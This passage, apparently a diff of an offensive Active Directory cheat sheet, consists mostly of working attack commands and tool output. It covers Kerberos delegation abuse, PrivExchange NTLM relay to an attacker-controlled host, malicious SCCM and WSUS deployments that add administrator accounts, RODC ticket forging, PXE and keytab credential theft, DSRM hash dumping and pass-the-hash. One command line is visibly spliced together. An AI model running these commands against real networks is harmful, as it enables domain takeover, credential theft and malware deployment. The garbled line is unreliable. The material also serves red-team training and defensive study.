/domain:test.local" exit - -# Set PrincipalsAllowedToDelegateToAccount -Install-WindowsFeature RSAT-AD-PowerShell -Import-Module ActiveDirectory -Get-ADComputer AttackerService -Set-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$ -Get-ADComputer Service2 -Properties PrincipalsAllowedToDelegateToAccount - -# Execute the attack -python .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes 830f8df592f48bc036ac79a2bb8036c5:830f8df592f48bc036ac79a2bb8036c5 -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc test.local/AttackerService -force-forwardableet-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$ - -# Load the ticket -.\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit | Out-Null -``` - -## PrivExchange attack - -Exchange your privileges for Domain Admin privs by abusing Exchange. -:warning: You need a shell on a user account with a mailbox. - - -1. Exchange server hostname or IP address - - ```bash - pth-net rpc group members "Exchange Servers" -I dc01.domain.local -U domain/username - ``` - - -2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket). - - ```powershell - ntlmrelayx.py -t ldap://dc01.domain.local --escalate-user username - ``` - - -3. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. Forcing the Exchange server's to send back its NTLMv2 hash to a controlled machine. - - ```bash - # https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py - python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx - python privexchange.py -ah 10.0.0.2 mail01.domain.local -d domain.local -u user_exchange -p pass_exchange - - # https://github.com/G0ldenGunSec/PowerPriv - powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016 - ``` - -4. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash - - ```bash - python secretsdump.py xxxxxxxxxx -just-dc - python secretsdump.py lab/buff@192.168.0.2 -ntds ntds -history -just-dc-ntlm - ``` - -5. Clean your mess and restore a previous state of the user's ACL - - ```powershell - python aclpwn.py --restore ../aclpwn-20190319-125741.restore - ``` - -Alternatively you can use the Metasploit module - -[`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420) - -Alternatively you can use an all-in-one tool : Exchange2domain. - -```powershell -git clone github.com/Ridter/Exchange2domain -python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip -python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip -``` - -## SCCM Deployment - -> SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation. - -* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM) -* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM) - - -* Using **SharpSCCM** - ```ps1 - .\SharpSCCM.exe get device --server --site-code - .\SharpSCCM.exe exec -d -r - .\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug - ``` -* Compromise client, use locate to find management server - ```ps1 - MalSCCM.exe locate - ``` -* Enumerate over WMI as an administrator of the Distribution Point - ```ps1 - MalSCCM.exe inspect /server: /groups - ``` -* Compromise management server, use locate to find primary server -* Use `inspect` on primary server to view who you can target - ```ps1 - MalSCCM.exe inspect /all - MalSCCM.exe inspect /computers - MalSCCM.exe inspect /primaryusers - MalSCCM.exe inspect /groups - ``` -* Create a new device group for the machines you want to laterally move too - ```ps1 - MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device - MalSCCM.exe inspect /groups - ``` - -* Add your targets into the new group - ```ps1 - MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL - ``` -* Create an application pointing to a malicious EXE on a world readable share : `SCCMContentLib$` - ```ps1 - MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe" - MalSCCM.exe inspect /applications - ``` - -* Deploy the application to the target group - ```ps1 - MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment - MalSCCM.exe inspect /deployments - ``` -* Force the target group to checkin for updates - ```ps1 - MalSCCM.exe checkin /groupname:TargetGroup - ``` - -* Cleanup the application, deployment and group - ```ps1 - MalSCCM.exe app /cleanup /name:demoapp - MalSCCM.exe group /delete /groupname:TargetGroup - ``` - - -## SCCM Network Access Accounts - -> If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. - -* Find SCCM blob - ```ps1 - Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount" - NetworkAccessPassword : - NetworkAccessUsername : - ``` -* Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) or [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption - ```ps1 - .\SharpDPAPI.exe SCCM - .\SharpSCCM.exe get naa -u USERNAME -p PASSWORD - ``` -* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`: - ```ps1 - Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl - ConvertFrom-SddlString "" - ``` - - -## SCCM Shares - -> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares - -* [1njected/CMLoot](https://github.com/1njected/CMLoot) - ```ps1 - Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt - Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml - Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi - ``` - - -## WSUS Deployment - -> Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates. You can use WSUS to fully manage the distribution of updates that are released through Microsoft Update to computers on your network - -:warning: The payload must be a Microsoft signed binary and must point to a location on disk for the WSUS server to load that binary. - -* [SharpWSUS](https://github.com/nettitude/SharpWSUS) - -1. Locate using `HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate` or `SharpWSUS.exe locate` -2. After WSUS Server compromise: `SharpWSUS.exe inspect` -3. Create a malicious patch: `SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add ^& net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"` -4. Deploy it on the target: `SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group"` -5. Check status deployment: `SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local` -6. Clean up: `SharpWSUS.exe delete /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:”Demo Group` - -## RODC - Read Only Domain Controller - -RODCs are an alternative for Domain Controllers in less secure physical locations -- Contains a filtered copy of AD (LAPS and Bitlocker keys are excluded) -- Any user or group specified in the **managedBy** attribute of an RODC has local admin access to the RODC server - - -### RODC Golden Ticket - -* You can forge an RODC golden ticket and present it to a writable Domain Controller only for principals listed in the RODC’s **msDS-RevealOnDemandGroup** attribute and not in the RODC’s **msDS-NeverRevealGroup** attribute - - -### RODC Key List Attack - -**Requirements**: -* [Impacket PR #1210 - The Kerberos Key List Attack](https://github.com/SecureAuthCorp/impacket/pull/1210) -* **krbtgt** credentials of the RODC (-rodcKey) -* **ID of the krbtgt** account of the RODC (-rodcNo) - -* using Impacket - ```ps1 - # keylistattack.py using SAMR user enumeration without filtering (-full flag) - keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full - - # keylistattack.py defining a target username (-t flag) - keylistattack.py -kdc server.domain.local -t user -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX LIST - - # secretsdump.py using the Kerberos Key List Attack option (-use-keylist) - secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist - ``` -* Using Rubeus - ```ps1 - Rubeus.exe golden /rodcNumber:25078 /aes256:eacd894dd0d934e84de35860ce06a4fac591ca63c228ddc1c7a0ebbfa64c7545 /user:admin /id:1136 /domain:lab.local /sid:S-1-5-21-1437000690-1664695696-1586295871 - Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/lab.local /dc:dc1.lab.local /ticket:doIFgzCC[...]wIBBxhYnM= - ``` - - -### RODC Computer Object - -When you have one the following permissions to the RODC computer object: **GenericWrite**, **GenericAll**, **WriteDacl**, **Owns**, **WriteOwner**, **WriteProperty**. - -* Add a domain admin account to the RODC's **msDS-RevealOnDemandGroup** attribute - ```ps1 - PowerSploit> Set-DomainObject -Identity RODC$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')} - ``` - - -## PXE Boot image attack - -PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it. - -- Press **[F8]** during the PXE boot to spawn an administrator console on the deployed machine. -- Press **[SHIFT+F10]** during the initial Windows setup process to bring up a system console, then add a local administrator or dump SAM/SYSTEM registry. - - ```powershell - net user hacker Password123! /add - net localgroup administrators /add hacker - ``` - -- Extract the pre-boot image (wim files) using [PowerPXE.ps1 (https://github.com/wavestone-cdt/powerpxe)](https://github.com/wavestone-cdt/powerpxe) and dig through it to find default passwords and domain accounts. - - ```powershell - # Import the module - PS > Import-Module .\PowerPXE.ps1 - - # Start the exploit on the Ethernet interface - PS > Get-PXEcreds -InterfaceAlias Ethernet - PS > Get-PXECreds -InterfaceAlias « lab 0 » - - # Wait for the DHCP to get an address - >> Get a valid IP address - >>> >>> DHCP proposal IP address: 192.168.22.101 - >>> >>> DHCP Validation: DHCPACK - >>> >>> IP address configured: 192.168.22.101 - - # Extract BCD path from the DHCP response - >> Request BCD File path - >>> >>> BCD File path: \Tmp\x86x64{5AF4E332-C90A-4015-9BA2-F8A7C9FF04E6}.bcd - >>> >>> TFTP IP Address: 192.168.22.3 - - # Download the BCD file and extract wim files - >> Launch TFTP download - >>>> Transfer succeeded. - >> Parse the BCD file: conf.bcd - >>>> Identify wim file : \Boot\x86\Images\LiteTouchPE_x86.wim - >>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim - >> Launch TFTP download - >>>> Transfer succeeded. - - # Parse wim files to find interesting data - >> Open LiteTouchPE_x86.wim - >>>> Finding Bootstrap.ini - >>>> >>>> DeployRoot = \\LAB-MDT\DeploymentShare$ - >>>> >>>> UserID = MdtService - >>>> >>>> UserPassword = Somepass1 - ``` - -## DNS Reconnaissance - -Perform ADIDNS searches - -```powershell -StandIn.exe --dns --limit 20 -StandIn.exe --dns --filter SQL --limit 10 -StandIn.exe --dns --forest --domain redhook --user RFludd --pass Cl4vi$Alchemi4e -StandIn.exe --dns --legacy --domain redhook --user RFludd --pass Cl4vi$Alchemi4e -``` - -## DSRM Credentials - -> Directory Services Restore Mode (DSRM) is a safe mode boot option for Windows Server domain controllers. DSRM allows an administrator to repair or recover to repair or restore an Active Directory database. - -This is the local administrator account inside each DC. Having admin privileges in this machine, you can use mimikatz to dump the local Administrator hash. Then, modifying a registry to activate this password so you can remotely access to this local Administrator user. - -```ps1 -Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' - -# Check if the key exists and get the value -Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior - -# Create key with value "2" if it doesn't exist -New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD - -# Change value to "2" -Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -``` - - -## Linux Active Directory - -## CCACHE ticket reuse from /tmp - -> When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions - -List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache`. Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID. - -```powershell -$ ls /tmp/ | grep krb5cc -krb5cc_1000 -krb5cc_1569901113 -krb5cc_1569901115 - -$ export KRB5CCNAME=/tmp/krb5cc_1569901115 -``` - - -## CCACHE ticket reuse from keyring - -Tool to extract Kerberos tickets from Linux kernel keys : https://github.com/TarlogicSecurity/tickey - -```powershell -# Configuration and build -git clone https://github.com/TarlogicSecurity/tickey -cd tickey/tickey -make CONF=Release - -[root@Lab-LSV01 /]# /tmp/tickey -i -[*] krb5 ccache_name = KEYRING:session:sess_%{uid} -[+] root detected, so... DUMP ALL THE TICKETS!! -[*] Trying to inject in tarlogic[1000] session... -[+] Successful injection at process 25723 of tarlogic[1000],look for tickets in /tmp/__krb_1000.ccache -[*] Trying to inject in velociraptor[1120601115] session... -[+] Successful injection at process 25794 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache -[*] Trying to inject in trex[1120601113] session... -[+] Successful injection at process 25820 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache -[X] [uid:0] Error retrieving tickets -``` - -## CCACHE ticket reuse from SSSD KCM - -SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. -The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. -By default, the key is only readable if you have **root** permissions. - -Invoking `SSSDKCMExtractor` with the --database and --key parameters will parse the database and decrypt the secrets. - -```powershell -git clone https://github.com/fireeye/SSSDKCMExtractor -python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey -``` - -The credential cache Kerberos blob can be converted into a usable Kerberos CCache file that can be passed to Mimikatz/Rubeus. - - -## CCACHE ticket reuse from keytab - -```powershell -git clone https://github.com/its-a-feature/KeytabParser -python KeytabParser.py /etc/krb5.keytab -klist -k /etc/krb5.keytab -``` - -## Extract accounts from /etc/krb5.keytab - -The service keys used by services that run as root are usually stored in the keytab file /etc/krb5.keytab. This service key is the equivalent of the service's password, and must be kept secure. - -Use [`klist`](https://adoptopenjdk.net/?variant=openjdk13&jvmVariant=hotspot) to read the keytab file and parse its content. The key that you see when the [key type](https://cwiki.apache.org/confluence/display/DIRxPMGT/Kerberos+EncryptionKey) is 23 is the actual NT Hash of the user. - -```powershell -$ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab -[...] -[26] Service principal: host/COMPUTER@DOMAIN - KVNO: 25 - Key type: 23 - Key: 31d6cfe0d16ae931b73c59d7e0c089c0 - Time stamp: Oct 07, 2019 09:12:02 -[...] -``` - -On Linux you can use [`KeyTabExtract`](https://github.com/sosdave/KeyTabExtract): we want RC4 HMAC hash to reuse the NLTM hash. - -```powershell -$ python3 keytabextract.py krb5.keytab -[!] No RC4-HMAC located. Unable to extract NTLM hashes. # No luck -[+] Keytab File successfully imported. - REALM : DOMAIN - SERVICE PRINCIPAL : host/computer.domain - NTLM HASH : 31d6cfe0d16ae931b73c59d7e0c089c0 # Lucky -``` - -On macOS you can use `bifrost`. - -```powershell -./bifrost -action dump -source keytab -path test -``` - -Connect to the machine using the account and the hash with CME. - -```powershell -$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN" -CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0 -``` - -## References - -* [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) -* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) -* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) -* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf) -* [Abusing S4U2Self: Another Sneaky Active Directory Persistence - Alsid](https://alsid.com/company/news/abusing-s4u2self-another-sneaky-active-directory-persistence) -* [Attacks Against Windows PXE Boot Images - February 13th, 2018 - Thomas Elling](https://blog.netspi.com/attacks-against-windows-pxe-boot-images/) -* [BUILDING AND ATTACKING AN ACTIVE DIRECTORY LAB WITH POWERSHELL - @myexploit2600 & @5ub34x](https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/) -* [Becoming Darth Sidious: Creating a Windows Domain (Active Directory) and hacking it - @chryzsh](https://chryzsh.gitbooks.io/darthsidious/content/building-a-lab/building-a-lab/building-a-small-lab.html) -* [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf) -* [COMPROMISSION DES POSTES DE TRAVAIL GRÂCE À LAPS ET PXE MISC n° 103 - mai 2019 - Rémi Escourrou, Cyprien Oger ](https://connect.ed-diamond.com/MISC/MISC-103/Compromission-des-postes-de-travail-grace-a-LAPS-et-PXE) -* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) -* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/) -* [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/) -* [Dumping Domain Password Hashes - Pentestlab](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/) -* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/) -* [Exploiting PrivExchange - April 11, 2019 - @chryzsh](https://chryzsh.github.io/exploiting-privexchange/) -* [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/) -* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288) -* [How Attackers Use Kerberos Silver Tickets to Exploit Systems - Sean Metcalf](https://adsecurity.org/?p=2011) -* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) -* [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html) -* [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html) -* [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/) -* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/) -* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1) -* [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) -* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/) -* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/) -* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/) -* [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/) -* [Pen Testing Active Directory Environments - Part III: Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/) -* [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/) -* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/) -* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/) -* [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/) -* [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/) -* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/) -* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/) -* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) -* [Roasting AS-REPs - January 17, 2017 - harmj0y](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/) -* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa) -* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/) -* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/) -* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/) -* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/) -* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/) -* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/) -* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/) -* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) -* [A Case Study in Wagging the Dog: Computer Takeover - Will Schroeder - Feb 28, 2019](https://posts.specterops.io/a-case-study-in-wagging-the-dog-computer-takeover-2bcb7f94c783) -* [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) -* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) -* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) -* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) -* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) -* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) -* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) -* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) -* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) -* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https://www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/) -* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) -* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) -* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) -* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) -* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) -* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation) -* [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/) -* [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/) -* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/) -* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html) -* [ACE to RCE - @JustinPerdok - July 24, 2020](https://sensepost.com/blog/2020/ace-to-rce/) -* [Zerologon:Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472) - Tom Tervoort, September 2020](https://www.secura.com/pathtoimg.php?id=2055) -* [Access Control Entries (ACEs) - The Hacker Recipes - @_nwodtuhs](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-aces) -* [CVE-2020-17049: Kerberos Bronze Bit Attack – Practical Exploitation - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/) -* [CVE-2020-17049: Kerberos Bronze Bit Attack – Theory - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/) -* [Kerberos Bronze Bit Attack (CVE-2020-17049) Scenarios to Potentially Compromise Active Directory](https://www.hub.trimarcsecurity.com/post/leveraging-the-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-compromise-active-directory) -* [GPO Abuse: "You can't see me" - Huy Kha - July 19, 2019](https://pentestmag.com/gpo-abuse-you-cant-see-me/) -* [Lateral movement via dcom: round 2 - enigma0x3 - January 23, 2017](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/) -* [New lateral movement techniques abuse DCOM technology - Philip Tsukerman - Jan 25, 2018](https://www.cybereason.com/blog/dcom-lateral-movement-techniques) -* [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html) -* [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/) -* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab) -* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) -* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/) -* [Microsoft ADCS – Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/) -* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/) -* [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) -* [Certified Pre-Owned Abusing Active Directory Certificate Services - @harmj0y @tifkin_](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Certified-Pre-Owned-Abusing-Active-Directory-Certificate-Services.pdf) -* [Certified Pre-Owned - Will Schroeder - Jun 17 2021](https://posts.specterops.io/certified-pre-owned-d95910965cd2) -* [AD CS/PKI template exploit via PetitPotam and NTLMRelayx, from 0 to DomainAdmin in 4 steps by frank | Jul 23, 